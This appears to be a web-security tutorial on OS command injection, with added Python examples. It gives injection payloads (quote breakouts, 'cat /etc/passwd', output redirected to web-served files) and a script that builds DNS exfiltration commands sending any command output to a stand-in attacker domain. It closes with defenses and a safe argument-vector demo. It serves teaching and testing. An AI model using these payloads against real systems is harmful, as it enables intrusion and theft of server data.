Command Injection Attack
Command Injection (OS command injection) is a vulnerability that lets an attacker execute arbitrary operating-system commands on the server that hosts a vulnerable application. It occurs when the application takes user input and uses it to build a system command that is handed to a shell, without validating or escaping the input. The injected commands run with the privileges of the application process, so the attacker can read or delete files, reach internal systems and, if the process is privileged or can be escalated, take over the host.
| Purpose of command | Linux | Windows |
|---|---|---|
| Name of current user | whoami | whoami |
| Operating system | uname -a | ver |
| Network configuration | ifconfig | ipconfig /all |
| Network connections | netstat -an | netstat -an |
| Running processes | ps -ef | tasklist |
The simplest form of command injection appends extra commands to the user input. For example, consider a web application that lets a user search for a book by title and builds a shell command like this:
$ booksearch 'title'
Because the input is placed inside single quotes, the input title; ls would stay inside the quotes and reach booksearch as one harmless argument. The attacker must first close the quote, for example by entering:
title'; ls #
The resulting command executed on the server is:
$ booksearch 'title'; ls #'
The shell runs booksearch 'title', then ls, and treats the rest of the line (including the dangling quote) as a comment. The listing of the current directory is returned along with the search results. If the application does not quote the input at all, the plain title; ls suffices.
Blind Command Injection is the case where the application executes the injected command but does not return its output in the response. The attacker cannot read the result directly and instead infers it from side effects: a time delay, a file written somewhere readable, or an out-of-band network request.
- For example, consider a web application that lets a user ping a remote server. The application constructs a command like this:
$ ping 'server'
If the attacker enters the following input into the host field (closing the single quote first, as above):
server'; cat /etc/passwd #
The resulting command executed on the server is:
$ ping 'server'; cat /etc/passwd #'
The attacker does not see the output of cat, but can still confirm that injection works, for instance by injecting sleep 10 and observing that the response is delayed, and can then exfiltrate the file contents with the techniques below.
- Another example is a feedback form that e-mails the submitted message; the application builds a command such as:
mail -s "This site is great" -aFrom:[email protected] [email protected]
Any output from the mail command is not included in the application's response, so an injected echo payload shows nothing. Instead, detect blind OS command injection with a time delay. With the email parameter unquoted in the command, submit:
& ping -c 10 127.0.0.1 &
If the response arrives roughly ten seconds later than normal, the injected command ran (sleep 10 is a drop-in alternative where ping is not installed).
- Exploiting blind OS command injection by redirecting output: use Burp Suite to intercept the request that submits feedback and change the email parameter to:
email=||whoami>/var/www/images/output.txt||
The || separators run whoami when the preceding mail command fails, and its output is redirected into a directory the web server serves. Then intercept the request that loads a product image and change the filename parameter to the file you just wrote:
filename=output.txt
The image response now contains the output of the injected command.
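The two blind techniques above (time-delay detection and redirecting output into a web-served file), as an added example that is not code from the original page. The feedback handler is simulated locally: `false` stands in for `mail` (it accepts any arguments, prints nothing and exits non-zero, which is what the `||` payload relies on), the email parameter is unquoted as in the payloads above, the command output is captured but never returned, and a temporary directory stands in for /var/www/images. `sleep 1` replaces `ping -c 10 127.0.0.1` so the check needs no network. It assumes a POSIX /bin/sh; the e-mail addresses are placeholders.

```python
import os
import subprocess
import tempfile
import time

# Added example; not code from the original page. `false` stands in for `mail`
# (mangled arguments make the real command fail too, which the `||` payload
# relies on); the email parameter is unquoted; the addresses are placeholders.


def submit_feedback(email: str) -> None:
    """Simulated vulnerable handler. The response carries no command output."""
    cmd = f'false -s "This site is great" -aFrom:{email} feedback@example.invalid'
    # capture_output holds the pipes open until every process that inherited
    # them exits, so even a backgrounded injected command delays the return,
    # which is what makes the time-delay probe observable.
    subprocess.run(cmd, shell=True, capture_output=True)


def response_time(email: str) -> float:
    """Wall-clock time of one submission, as measured from the attacker's side."""
    start = time.monotonic()
    submit_feedback(email)
    return time.monotonic() - start


def time_delay_payload(seconds: int) -> str:
    """The page's `& ping -c 10 127.0.0.1 &`, with sleep instead of ping."""
    return f"& sleep {seconds} &"


def is_time_based_injectable(seconds: int = 1) -> bool:
    """Compare a benign submission with the delay payload; a response slower
    by roughly `seconds` means the injected command ran."""
    baseline = response_time("user@example.invalid")
    delayed = response_time(time_delay_payload(seconds))
    return delayed - baseline >= 0.8 * seconds


def make_web_root() -> str:
    """Stand-in for /var/www/images: a fresh temporary directory."""
    return tempfile.mkdtemp(prefix="images-")


def exfil_via_file(command: str, web_root: str) -> str:
    """Redirect the command's output into the web-served directory with the
    page's ||cmd>file|| payload, then read it back the way the second request
    (filename=output.txt) does."""
    out = os.path.join(web_root, "output.txt")
    submit_feedback(f"||{command}>{out}||")
    with open(out) as fh:
        return fh.read().strip()


if __name__ == "__main__":
    print("time-based injection detected:", is_time_based_injectable())
    print("whoami via output.txt:", exfil_via_file("whoami", make_web_root()))
```

The delay threshold is 80% of the requested sleep rather than the full value so that normal jitter does not mask a real hit; in practice, repeat the probe a few times and vary the delay to rule out a slow backend.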
Blind Out-of-Band Command Injection is a variant of blind injection in which the attacker does not rely on the application's response at all. The injected command makes the server contact a system the attacker controls over a separate channel, typically a DNS lookup or an HTTP request, using out-of-band application security testing ([OAST]) infrastructure such as Burp Collaborator.
For example, consider again the web application that searches for a book by title:
$ booksearch 'title'
If the attacker enters the following input into the search field:
title'; ping attacker.com #
The resulting command executed on the server is:
$ booksearch 'title'; ping attacker.com #'
The server sends ICMP echo requests to attacker.com. Seeing them arrive confirms that the command executed, but ping carries no command output. To read results, embed them in the hostname of a DNS lookup, which the server's resolver forwards to the attacker's authoritative name server:
& nslookup $(whoami).kgji2ohoyw.web-attacker.com &
(whoami wrapped in backticks is equivalent to $(whoami).) The DNS query recorded by the attacker then reads:
wwwuser.kgji2ohoyw.web-attacker.com
showing that the command runs as the user wwwuser.
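The DNS exfiltration above works as written only because a username is already a valid DNS label. The following added example (not code from the original page) generalises it: the injected fragment hex-encodes arbitrary command output, splits it into labels of at most 63 characters and prepends them to the collaborator domain, and the receiving side decodes the recorded query name. The encoding part of the shell pipeline is also run locally (without nslookup or any network) to confirm it matches the decoder. kgji2ohoyw.web-attacker.com is taken from the page as a placeholder for an attacker-controlled domain; od, tr, cut, fold and paste are assumed to be the POSIX utilities.

```python
import binascii
import shlex
import subprocess

# Added example; not from the original page. DOMAIN is a placeholder for the
# attacker's collaborator domain (the page's kgji2ohoyw.web-attacker.com).
DOMAIN = "kgji2ohoyw.web-attacker.com"

# Shell pipeline used inside the injected command: hex-encode stdin (DNS labels
# allow only letters, digits and hyphens), keep at most 200 hex chars so the
# full name stays under the 253-byte limit, split into 63-char labels (the
# per-label maximum) and join them with dots. od/tr/cut/fold/paste are POSIX;
# xxd, which is shorter, is not always installed on the target.
HEX_LABELS = "od -An -tx1 | tr -d ' \\n' | cut -c 1-200 | fold -w 63 | paste -sd. -"


def dns_exfil_payload(command: str, domain: str = DOMAIN) -> str:
    """Build the fragment to inject into an unquoted parameter, generalising
    the page's `& nslookup $(whoami).<domain> &` to any command output."""
    return f"& nslookup $({command} | {HEX_LABELS}).{domain} &"


def decode_exfil_query(qname: str, domain: str = DOMAIN) -> str:
    """Collaborator side: strip the domain suffix from a recorded DNS query
    name, join the hex labels and decode them back to the command output."""
    qname = qname.rstrip(".")
    suffix = "." + domain
    if not qname.endswith(suffix):
        raise ValueError(f"{qname!r} is not a query for {domain}")
    hexdata = qname[: -len(suffix)].replace(".", "")
    return binascii.unhexlify(hexdata).decode("utf-8", errors="replace")


def local_encode(text: str) -> str:
    """Run only the encoding half of the payload locally on constructed input
    (printf stands in for the injected command) to show what name the target
    would look up. No nslookup is executed and nothing leaves the machine."""
    pipeline = f"printf '%s' {shlex.quote(text)} | {HEX_LABELS}"
    result = subprocess.run(pipeline, shell=True, capture_output=True, text=True, check=True)
    return result.stdout.strip()


if __name__ == "__main__":
    print("payload:", dns_exfil_payload("id"))
    # Constructed sample of what `id` might print on the target.
    sample = "uid=33(www-data) gid=33(www-data) groups=33(www-data)"
    labels = local_encode(sample)
    print("query name the target would resolve:", labels + "." + DOMAIN)
    print("decoded on the collaborator:", decode_exfil_query(labels + "." + DOMAIN))
```

The decoder is deliberately strict about the domain suffix: a collaborator server sees queries for many unrelated names (resolver retries, scanners), and only names ending in the registered domain carry exfiltrated data. Output longer than 100 bytes is truncated by the cut stage; chunk it over several lookups if more is needed.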
Use input validation and, above all, avoid passing user input through a shell, so that malicious commands cannot be executed on the server.
To prevent command injection, the application should not build shell command strings from user input at all. The safest options, in order of preference: use a library or platform API instead of invoking an external command; if a command is necessary, execute it directly with an argument vector (execve style) so the input arrives as a single argument and is never parsed by a shell; and validate the input against a strict allowlist (for example, a book title may be restricted to letters, digits and spaces) before using it. Escaping or blocklisting metacharacters is error-prone and only a last resort. "Parameterized queries" in this context means the same idea as in SQL: keep data separate from the command.
For example, in the book search above, instead of constructing the command string:
$ booksearch 'title'
the application should invoke booksearch with the title passed as its own argument, without a shell. The user input is then data, not part of the command line, and cannot add commands.
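The booksearch example from the start of the page and the fix just described, as an added example that is not code from the original page: the vulnerable shell-string version beside a quoted variant and the argument-vector version. `booksearch` is the page's hypothetical program, so `echo` stands in for it here and the search results are simply the echoed line; the payloads are constructed for the example, and a POSIX /bin/sh is assumed.

```python
import shlex
import subprocess

# Added example; not from the original page. `echo` stands in for the page's
# hypothetical booksearch program so that the three variants run anywhere.


def search_vulnerable(title: str) -> str:
    """Vulnerable: the title is interpolated into a shell command string.

    shell=True hands the whole string to /bin/sh, so shell metacharacters in
    `title` are interpreted. The single quotes only look protective: a payload
    that closes the quote escapes them.
    """
    cmd = f"echo 'booksearch: {title}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def search_quoted(title: str) -> str:
    """Still uses the shell, but shlex.quote() turns the input into exactly one
    shell word (embedded single quotes are escaped). Acceptable only when a
    shell pipeline is genuinely required; prefer the argv form below.
    """
    cmd = f"echo {shlex.quote('booksearch: ' + title)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def search_safe(title: str) -> str:
    """Hardened: no shell at all. The program receives an argument vector, so
    the title is exactly one argument whatever characters it contains. This is
    the command-line analogue of a parameterized query.
    """
    return subprocess.run(["echo", f"booksearch: {title}"],
                          capture_output=True, text=True).stdout


# Constructed payloads for the example.
NAIVE_PAYLOAD = "title; echo INJECTED"               # stays inside the quotes
BREAKOUT_PAYLOAD = "title'; echo INJECTED; echo '"   # closes the quote first


if __name__ == "__main__":
    for name, fn in (("shell string", search_vulnerable),
                     ("shlex.quote", search_quoted),
                     ("argv", search_safe)):
        for payload in (NAIVE_PAYLOAD, BREAKOUT_PAYLOAD):
            print(f"{name:13s} {payload!r:40s} -> {fn(payload)!r}")
```

Only the shell-string version ever prints a separate INJECTED line, and only for the payload that closes the quote; the other two return the title unchanged as data, which is the property an allowlist check should then be layered on top of.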
- Identify where user input is used to construct a system command.
- Test the input fields with characters such as quotes, semicolons and ampersands to see whether the input is being used to construct a command. A number of characters function as command separators, allowing commands to be chained together. The following separators work on both Windows and Unix-based systems: & && | || The following work only on Unix-based systems: ; and newline (0x0a or \n). On Unix-based systems you can also use backticks or the dollar character to perform inline execution of an injected command within the original command: `` `injected command` `` and $(injected command).
- Try to inject commands such as ls or cat /etc/passwd to test for the vulnerability; if the input lands inside quotes, close the quote first.
- If the output of the injected command is not visible, use blind command injection techniques (time delays, writing output to a web-accessible file) to confirm execution and gather information about the system.
- If the application returns nothing at all, use blind out-of-band techniques such as DNS lookups or HTTP requests to a server you control.
- Execute commands with an argument vector or use an API instead of a shell, so that user input can never be parsed as part of a command.
- Validate user input against an allowlist before using it in any command.
- Limit the privileges of the user account used to execute the system commands.
- Keep your software up to date with the latest security patches.
- Conduct regular security audits and penetration testing to identify and fix vulnerabilities before they can be exploited.
- Use Burp Scanner to check for the vulnerability.
Tools:
Reference:
- Hunting asynchronous vulnerabilities
- https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection
- https://book.hacktricks.xyz/pentesting-web/command-injection